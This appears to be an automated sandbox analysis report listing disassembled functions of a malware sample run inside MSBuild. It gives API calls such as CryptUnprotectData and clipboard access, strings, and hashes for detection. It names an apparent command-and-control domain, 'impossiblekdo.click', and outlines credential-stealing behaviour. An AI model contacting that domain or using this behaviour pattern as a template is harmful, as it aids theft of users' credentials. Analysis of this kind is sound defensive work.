Similarity

API ID: DefaultLanguageUser
String ID: *$+$-$Q
API String ID: 95929093-785157511
Opcode ID: b042d62ae6667676348fad028f6544a523b44269d66e3574bbfd4f6f4486606a
Instruction ID: c6cfa8010a289e2e649590f2f5895c9c6f8efd22583bca913b9e10c7319df7f5
Opcode Fuzzy Hash: b042d62ae6667676348fad028f6544a523b44269d66e3574bbfd4f6f4486606a
Instruction Fuzzy Hash: 8B417272E046648FCB68CF3CCC953D9BAB1AB49314F1842EEE859E7381DA745E808F44

Function 004089B0 Relevance: 7.8, APIs: 5, Instructions: 286
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004089D4
GetCurrentThreadId.KERNEL32 ref: 004089DE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408A8F
GetForegroundWindow.USER32 ref: 00408AE6
ExitProcess.KERNEL32 ref: 00408D37

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 15a1e9c9ccd5111c19b2a7c98503b6270db70d78381c8d230af2d9ae1c524c28
Instruction ID: 3b4283977abbf2ab0365c36b20981ccf0971cf16026c1c1a38a20da248edae98
Opcode Fuzzy Hash: 15a1e9c9ccd5111c19b2a7c98503b6270db70d78381c8d230af2d9ae1c524c28
Instruction Fuzzy Hash: 199145B2B047044BC3189F798D9635AF6D6AFC4314F0E863DA995DB3E1EA7888058786

Function 0040D973 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D97F

Strings

i, xrefs: 0040D994
impossiblekdo.click, xrefs: 0040DE58
iD, xrefs: 0040DA7E

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Uninitialize
String ID: i$impossiblekdo.click$iD
API String ID: 3861434553-3139651502
Opcode ID: 14003316e3f7599578d8115a7c03e01f91c998b0488bc88d0ff0e6d000fff25b
Instruction ID: 9ced649bd88a07240066c5e31cc611ab42174e8663c952c2e86e4f94a7236f00
Opcode Fuzzy Hash: 14003316e3f7599578d8115a7c03e01f91c998b0488bc88d0ff0e6d000fff25b
Instruction Fuzzy Hash: 04C1F1B25493918FD334CF65C8907DBBBE1ABD6300F0A896DC8D95B381DA790909CB96

Function 00425A91 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425AC1

Strings

23, xrefs: 00425EAC

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 23
API String ID: 237503144-326707096
Opcode ID: 9a3146229b57a68851395e4e84867cb2ba553d34ab626c6c80d0cab4eae3aafb
Instruction ID: a071786efabb86fcfd64b1916f4513dfa4523c99be9bd32db1f4f76c909fff59
Opcode Fuzzy Hash: 9a3146229b57a68851395e4e84867cb2ba553d34ab626c6c80d0cab4eae3aafb
Instruction Fuzzy Hash: 0DE1BAB56187409FE310DF65E88162BBBE1EFC6304F88892DE1D58B351E7788906CB5B

Function 00419B52 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 426
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419E13

Strings

hbty, xrefs: 00419BC2
pz|q, xrefs: 00419BD0

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: hbty$pz|q
API String ID: 834300711-98995051
Opcode ID: c26ce526e0d90f1b8ae54e8112f5567e5eb5954986c5f8c2dab1f710485ec949
Instruction ID: b60a76a49dd391e196a223a2205a20a63bcba479375ac930270acd3d47e42e5d
Opcode Fuzzy Hash: c26ce526e0d90f1b8ae54e8112f5567e5eb5954986c5f8c2dab1f710485ec949
Instruction Fuzzy Hash: F3D13AB16007018FD724CF29D891763BBE2FF55314F188A6DD49A8B792E739E846CB44

Function 0043759A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004375E8
GetSystemMetrics.USER32 ref: 004375F7

Strings

, xrefs: 004376CB

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: fd9f03126035a2c6b39d9b771c46d4d1a40c76cfe331e6fad6c65bc0150c85b5
Instruction ID: b95fc234e0d18c9c2c6c9f3a748baae0a8728c90c241cff2b5ae1d2fcc8c4eb4
Opcode Fuzzy Hash: fd9f03126035a2c6b39d9b771c46d4d1a40c76cfe331e6fad6c65bc0150c85b5
Instruction Fuzzy Hash: 015183B4E152189FDB40EFACD985A9DBBF0BB49300F01852EE858E7350D734A945CF96

Function 00441AA0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004449BD,00000002,00000018,?,?,00000018,?,?,?), ref: 00441ACE

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0042F608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042F635
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042F704

Strings

!"1(, xrefs: 0042F65D

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: !"1(
API String ID: 2904949787-4058720897
Opcode ID: a84ad412ae3e1cbfa91681209596a1ba6c0acbafc3bffa2da94e903604cb3dda
Instruction ID: 2e438bd110f1cac6f495b354c913827fcaffd1c4a7d245e89a5c263b0f7559c8
Opcode Fuzzy Hash: a84ad412ae3e1cbfa91681209596a1ba6c0acbafc3bffa2da94e903604cb3dda
Instruction Fuzzy Hash: D521F7341083D29ECB258F24D4687FBBBE4EB97305F48487ED0C997252CB344509CB55

Function 0042F606 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042F635
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042F704

Strings

!"1(, xrefs: 0042F65D

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: !"1(
API String ID: 2904949787-4058720897
Opcode ID: 8f4e10566f85e670dbd7e787dd3eaf3c672e3d68d7f02b69ab368bec23095bb4
Instruction ID: f10c923f744c9e9fb16a20c80d2526f1fa6460dfbf456a6160d8f3ed3ef1d3d8
Opcode Fuzzy Hash: 8f4e10566f85e670dbd7e787dd3eaf3c672e3d68d7f02b69ab368bec23095bb4
Instruction Fuzzy Hash: 4C2105351092919FC7248F20D869BFBBBE5EB86304F48487DD0CAD7152CB348409CB56

Function 00433B4A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00433BE8

Strings

0, xrefs: 00433EE5

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 71324abeecaaaf2aacc0c6994692bb1ba99962fd6b8808dd90520e3245190b83
Instruction ID: f6daa8f2f2b291b866b68b2d605238f94da6c134abdbf87db655163372ec1da7
Opcode Fuzzy Hash: 71324abeecaaaf2aacc0c6994692bb1ba99962fd6b8808dd90520e3245190b83
Instruction Fuzzy Hash: 01B1C421508FC28ED3328B3C4859797BFD16B67234F084B9DE1FE8B6E2D76461068766

Function 0042F5C2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042F704

Strings

!"1(, xrefs: 0042F65D

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ComputerName
String ID: !"1(
API String ID: 3545744682-4058720897
Opcode ID: 1f9a00c59e5e879eb35c4eda087fe2beb618e44bfc2c6dc8ca08ac96306e0454
Instruction ID: 02407868c32a142e49c1fff951d5a3358def299e73d93bb5f154d5de68ad48d2
Opcode Fuzzy Hash: 1f9a00c59e5e879eb35c4eda087fe2beb618e44bfc2c6dc8ca08ac96306e0454
Instruction Fuzzy Hash: 271106351093919FC724CF24D869BBBBBE4EB96308F48487EC0CAD7252CB34850ACB56

Function 0042F72A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042F80F

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 3e78269cc1f628c65f4d0c5d92b07debe3415c622e64807e171a3948fe2c4502
Instruction ID: e6ce04b267faf7464ad878427803358cd88b402f6d7df2c250318083cecd4b2b
Opcode Fuzzy Hash: 3e78269cc1f628c65f4d0c5d92b07debe3415c622e64807e171a3948fe2c4502
Instruction Fuzzy Hash: E721F23560C3D14AD7268F2484617EBBBE5AFD6304F48446EC5C997242C778890ACB96

Function 0042F726 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042F80F

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 2973b701bc626eb7bacba9d0c9febada56a978a9360ba4d7b72cbee541131b56
Instruction ID: 658a34571a9d8a1b048ed98096f4a77c32374fce8eb91868bfa244cf725863b3
Opcode Fuzzy Hash: 2973b701bc626eb7bacba9d0c9febada56a978a9360ba4d7b72cbee541131b56
Instruction Fuzzy Hash: 1C11D63660C3904BD3268F2488617E7BBE1ABD5314F59453EC5C997242C6784905CB96

Function 00442130 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00442189

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: f55c84f0faa60623b92c8a9445f4ace685aa27fd60c866df31196ef6b1247dcb
Instruction ID: 7713887e56ddcb5e61251368c8aecf105f40aadce4b28999bf764736141dd4f4
Opcode Fuzzy Hash: f55c84f0faa60623b92c8a9445f4ace685aa27fd60c866df31196ef6b1247dcb
Instruction Fuzzy Hash: 16012875A144408FEB0CDF34C890AA937F1EB5B305B1C40B9D103E7362D638AA00CF14

Function 00441A42 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00441A6A

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c902c51b374220b29206d97a8cb6ed1aea4fb6c0d89c55d660559b36c16f2cbe
Instruction ID: c889b3b777994790276d4f6a57cf030df6bc75f855c3f5843cd6d98e00571765
Opcode Fuzzy Hash: c902c51b374220b29206d97a8cb6ed1aea4fb6c0d89c55d660559b36c16f2cbe
Instruction Fuzzy Hash: 0AE02632D9A500EAE3103B397C07B2725249FA3B57F050536F1009407AEE2DC801829F

Function 00434DC8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434E0D

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1a23e27b44c8b4625c345d668319160c305b170b3bb437305f23415ba3cd232c
Instruction ID: 2d940412db10af45a70269ce19384a19a0f652cc87149939fa91a4bb570e828c
Opcode Fuzzy Hash: 1a23e27b44c8b4625c345d668319160c305b170b3bb437305f23415ba3cd232c
Instruction Fuzzy Hash: FAF074B45087068FE314DF68D5A871BBBE0FB85308F11891CE4958B290DBB69948CF82

Function 00432178 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004321C3

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 55b4cbebcd322cb3c6d2a706fc56c2e56046578710a10d9e9a8b36175fe852a5
Instruction ID: 40a1fada103f4286737c00ecb2b40a05757a8343765d31c3259b2b5ec5d1acf5
Opcode Fuzzy Hash: 55b4cbebcd322cb3c6d2a706fc56c2e56046578710a10d9e9a8b36175fe852a5
Instruction Fuzzy Hash: B5F022B45197018FE310DF29D5A871BBBE0BB84344F11991CE4998B390D7B9AA49CF82

Function 0040CF60 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CF73

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2477893d9250ba8c58df4051f80ce9a2ace3bc47c6915aa8a60a9bad9e74d129
Instruction ID: 6dae3f3c8af8259f7461475d0dc29f5aa55a0ba48c81a6b56b36479c71177b5b
Opcode Fuzzy Hash: 2477893d9250ba8c58df4051f80ce9a2ace3bc47c6915aa8a60a9bad9e74d129
Instruction Fuzzy Hash: DED02E202542006BC348A728EC16F2B329C8703315F00023EB2529A2C2EDA0290082A8

Function 0040CF95 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CFA7

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: bfe0413df39538f3b0cffe762a16f33be40b0849261d6c5140f1eeb8f356ea05
Instruction ID: 4714ec749d1da8ba86703ded21055e332d4ad56394b7da72a92342686646782a
Opcode Fuzzy Hash: bfe0413df39538f3b0cffe762a16f33be40b0849261d6c5140f1eeb8f356ea05
Instruction Fuzzy Hash: 9ED0C9383D830076F6345708AC13F2532115306F15F30062DB323FE6E0C9E07145860C

Function 0043FED0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,51DD6A77,00415178,00000000), ref: 0043FEF0

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0b6c23a6614fb71b0c6a09d6df633af2038e52fc9137a0124ae1fb6b2ee5daba
Instruction ID: e54997de52b7a5b543a73817e6ed4259d305c3aed6c7cce9df7ef83ef590c6c5
Opcode Fuzzy Hash: 0b6c23a6614fb71b0c6a09d6df633af2038e52fc9137a0124ae1fb6b2ee5daba
Instruction Fuzzy Hash: 13D0C931405622FBC6506F28BC15BE73A549F4A622F0748A1B5446B065D624DC918AD8

Function 0043FEB0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00408C4F,222D0C2F), ref: 0043FEC0

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3b55c4b4817f207c803bdf689a07dac8e379342ce86f01420ba0c7d61af9dde8
Instruction ID: 8764fe7512c33803e13e813a7aedc1b42fab2cc8f32088712a77dfc6a0185d69
Opcode Fuzzy Hash: 3b55c4b4817f207c803bdf689a07dac8e379342ce86f01420ba0c7d61af9dde8
Instruction Fuzzy Hash: BEC09B31445220BBD6106F15FC09FD63F54EF45756F554055B10867075C760BC81C6D8

Non-executed Functions

Function 00429D4A Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 271COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429E30
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00429EE5

Strings

rHM{, xrefs: 0042A194
A, xrefs: 0042A1A4
23, xrefs: 00429DC6
oXh^, xrefs: 0042A16C
fT-@, xrefs: 0042A17C
#K_c, xrefs: 0042A174
`PWj, xrefs: 0042A184
7*uu, xrefs: 0042A18C
#@A{, xrefs: 0042A19C

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #@A{$#K_c$23$7*uu$A$`PWj$fT-@$oXh^$rHM{
API String ID: 237503144-2863353174
Opcode ID: 5e17e2abe62602a8757904d41eaf0a95546a4d3f81e28a11ee7c28afe645a10a
Instruction ID: e4786c992d32e542d8db379d6aa485053f80070514389147786cf12c71eacdc2
Opcode Fuzzy Hash: 5e17e2abe62602a8757904d41eaf0a95546a4d3f81e28a11ee7c28afe645a10a
Instruction Fuzzy Hash: 00B1C9B4A08381DFE3208F24E840B2BBBE1FB86718F44496DE5C49B391D7799855CB97

Function 00436B80 Relevance: 9.1, APIs: 6, Instructions: 135clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436BA2
GetClipboardData.USER32 ref: 00436BC3
GlobalLock.KERNEL32 ref: 00436BE0
GlobalUnlock.KERNEL32 ref: 00436D11
CloseClipboard.USER32 ref: 00436D19

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: de6a2e184b00d642935acd8f7963af008746e3193ab8ef22421a4f5388a798ab
Instruction ID: 6bca6aab4f30d896cb24dae6eb02d2ab37128aba09380328214b5540e6126f4e
Opcode Fuzzy Hash: de6a2e184b00d642935acd8f7963af008746e3193ab8ef22421a4f5388a798ab
Instruction Fuzzy Hash: 1351E4B1908B439FD710AF7C994835ABFA0AB0A320F05872EE4E59B3C2D3389555C797

Function 00417E35 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 331COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041818B

Strings

WH, xrefs: 00418014
TW, xrefs: 0041801B
7, xrefs: 00418022

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7$TW$WH
API String ID: 237503144-1617174291
Opcode ID: 785ff9210cd2918ad323e254bd047c14a95bb7d4168f571d02f86e1a8b8e95ec
Instruction ID: 705b5b8f497aa9081b002cdd73fda665bd243ac863c7082e6cde8d333a76bd86
Opcode Fuzzy Hash: 785ff9210cd2918ad323e254bd047c14a95bb7d4168f571d02f86e1a8b8e95ec
Instruction Fuzzy Hash: EDB1F5726047018BC728CF28C8913A7B7F2FF95314B2A855DC09A4F7A1DB7AA843CB44

Function 004260D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004261CD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042624A

Strings

2cB, xrefs: 00426324
TZ, xrefs: 004260E1

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2cB$TZ
API String ID: 237503144-1919056775
Opcode ID: 5157cc2f4def2222143a48eefe6ed34e63f0d6807792f6f3ee8c6a7d5808f390
Instruction ID: e79587b430c50394c843798e1132bcd84ec1aef2443012f4b04a00c8efc0345d
Opcode Fuzzy Hash: 5157cc2f4def2222143a48eefe6ed34e63f0d6807792f6f3ee8c6a7d5808f390
Instruction Fuzzy Hash: C961FEB16083509FE314CF24E88175FBBE1EBC6308F50892DF6959B281D7B59909CB97

Function 0040DE8E Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 347COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DE9A

Strings

impossiblekdo.click, xrefs: 0040E368
iD, xrefs: 0040DF8E
i, xrefs: 0040DEAF

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Uninitialize
String ID: i$impossiblekdo.click$iD
API String ID: 3861434553-3139651502
Opcode ID: c036f7d96e699aabcb00218a626829bf0a1d1da531205926e6f21f2066e694fe
Instruction ID: f19f7d63c5a078be6d2d0d3354e0bce42a97a11ffa1e50c0a33dd0ba97b35c5a
Opcode Fuzzy Hash: c036f7d96e699aabcb00218a626829bf0a1d1da531205926e6f21f2066e694fe
Instruction Fuzzy Hash: 10C1F1B25093918FD331CF25C4907DBBFE1ABD6304F198D6DC8D95B392DA7909098B92

Function 00437291 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004372C5
GetSystemMetrics.USER32 ref: 004372D4

Strings

, xrefs: 00437382

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 64bca6fc7348439f6ec99349d83ebd95cf56766e58815ef0b78a23439e5fb008
Instruction ID: 92b41f4802adc6c6e967c3d6e1cad8a4c8ae76d6d49a1f576b0552df4b956962
Opcode Fuzzy Hash: 64bca6fc7348439f6ec99349d83ebd95cf56766e58815ef0b78a23439e5fb008
Instruction Fuzzy Hash: 2C3191B49193148FDB00EF78D98560EBBF4BB89304F01856EE898DB364D374A949CF96

